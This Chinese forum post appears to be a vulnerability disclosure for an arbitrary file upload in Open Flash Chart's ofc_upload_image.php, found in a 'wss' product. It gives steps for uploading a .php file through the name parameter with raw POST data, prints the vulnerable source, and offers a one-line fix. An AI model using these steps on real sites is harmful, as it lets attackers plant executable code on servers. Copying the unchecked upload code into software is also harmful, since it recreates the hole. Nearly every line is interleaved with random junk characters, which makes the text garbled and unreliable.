POST 数据漏洞文件执行任意后缀文件保存
* _! l# c( m9 J5 n3 C8 p: i' ], n 漏洞文件/chart/php-ofc-library/ofc_upload_image.php
, D8 p. G+ ]% D2 H {# H
! B1 ^1 t5 {9 Y利用:
$ U! {# C: j' z" d. d/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名$ s- Z* I' ], F3 F4 }/ H/ H
; V5 q* \% r! G' gPost任意数据* N i% s$ E4 N# U- b* E- R
保存位置http://localhost/chart/tmp-upload-images/hfy.php
# @* F( l- W4 ]/ [7 H3 P
3 m6 H' {9 J9 u' j* M+ R
. g. r! `! u7 ?最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~1 D% h; N/ R. I. J) W9 x% y
4 P( S, C" q, m. g
<?php
1 i5 V/ P7 P F# I |" ?
! f- G( g* k6 t//
0 z K+ Z2 Y9 I: f% j// In Open Flash Chart -> save_image debug mode, you8 V# ?3 p/ p! t* m/ F( n# h
// will see the 'echo' text in a new window.
; [4 _6 _5 [2 g" D//
% P5 T" _- h8 c+ U1 o
) }" M% F! N. [6 _" u y/*
/ ?1 W) r1 l# l+ a: F, N
+ J5 [( c: Q1 nprint_r( $_GET );
+ z1 h9 f2 s) p' W$ Pprint_r( $_POST );
1 m y, Y/ i0 f9 S6 b8 Kprint_r( $_FILES );
8 v4 t4 B2 L: L% @( f4 w+ }6 @" u! w& H* ~
print_r( $GLOBALS );+ t: k( f/ Q( x; p4 R% _
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );" e8 D, Y( I& ]% ~& s
9 ~0 V+ R, q6 R2 M*/
$ r" I2 v$ j# O- B9 s/ s* i1 S// default path for the image to be stored //, i! D6 W9 u, u$ o
$default_path = '../tmp-upload-images/';6 l& G0 v% e2 g; M7 s
8 W5 c l% a6 v* w& [/ a- j/ zif (!file_exists($default_path)) mkdir($default_path, 0777, true);3 _! o, x7 H R- S& n
: |3 B0 a P, }' ]7 O1 P// full path to the saved image including filename //
& ~# h) k7 M p$destination = $default_path . basename( $_GET[ 'name' ] );
5 C9 |: W6 ?$ Y2 n( Z
q0 }0 f6 M$ o2 R- _+ Uecho 'Saving your image to: '. $destination;
3 q2 i! f- v( f// print_r( $_POST );; k- |5 X! k' g& ^- Z0 V
// print_r( $_SERVER );
2 J. l% m* {' k1 @& f// echo $HTTP_RAW_POST_DATA;' }* e% k2 n( w$ P z7 `, J
+ Z, w0 i4 Z$ y0 p% c
//
# y. C% J# U7 W// POST data is usually string data, but we are passing a RAW .png
' U1 f1 q2 b0 F- `// so PHP is a bit confused and $_POST is empty. But it has saved- s& T" h1 k4 W# k/ Y. v; d6 ^- n
// the raw bits into $HTTP_RAW_POST_DATA0 n6 {9 f. ]+ V3 g* Q$ o, d$ A
//, |2 x. J X' \' C4 r7 h
# a5 O) N5 E7 \$ I6 i$jfh = fopen($destination, 'w') or die("can't open file");
- {+ I* }0 v9 b+ i8 ~3 ]; X3 jfwrite($jfh, $HTTP_RAW_POST_DATA);
9 Q' t3 w% _! m a) yfclose($jfh);( ?2 f& A2 u: Z
H+ e; y9 n+ R6 |: M
//9 K* o1 m: n: G8 W |& F
// LOOK:; q$ p, B6 M4 r, ^9 G% W
//% }8 j9 e0 Q* o/ C
exit();9 b. [. _! ~5 N% P/ D
//" \( Z6 N7 u5 u3 F3 a
// PHP5:
) w3 c, O. g7 E3 A//, b2 }' Y5 R+ s# U4 }6 I* ]8 k
# e; {( n3 V0 R) X( p; N
: _( N) M- R! h& Y0 \7 r: ^: Q// default path for the image to be stored //" x& _( I, `) V1 X+ N# n
$default_path = 'tmp-upload-images/';
: R) L9 _, K1 c9 s; f$ g+ w: J. _+ e" f% C
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
& a- w D. C7 f% O, Q6 {5 P) c7 X+ n" ~! p
// full path to the saved image including filename //" k$ i* Y8 l. y6 x* V: c5 ?: H
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] ); ' G4 r* E; Q7 b T4 g! G/ ^2 W
) G ]( _! c( V! T( f
// move the image into the specified directory //
! b2 j8 o( Y6 J' c. H$ Mif (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
3 u, @) f' F4 S! Q( p! N echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";# K H; q7 ]# f% w" K( Y
} else {' v/ f8 J: _. M! ^$ b$ `# [& R
echo "FILE UPLOAD FAILED";
) i2 X" ]4 P( e3 @% n$ ?; h9 \; |}" f1 B) x3 b+ _9 Z& ^
1 ~+ f2 B+ z5 H! M
~7 u/ I8 H$ ^) k K/ n' U# s. Q
?>$ f, j% k5 t( v w
. y' p3 @8 _% `3 ^- R/ u/ o+ \2 \
3 |% P+ o5 J: K' k" t1 p; N, M/ M0 ^0 D1 A
; b c M* w, U" N/ G- L" r
7 `+ V( e( O H) M
) U [0 Q4 s4 l/ g8 t修复方案: 0 v# S5 } z! J+ x0 m7 M1 ]# e
这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞
+ p9 M' T& i- q' x8 @3 J
" A& {" g. p: e. z# L# F# _! b% t0 y2 ]4 n
$ O6 k8 p$ s: k, `5 Z/ x
4 {6 J& F0 M7 W3 z% y m' N
|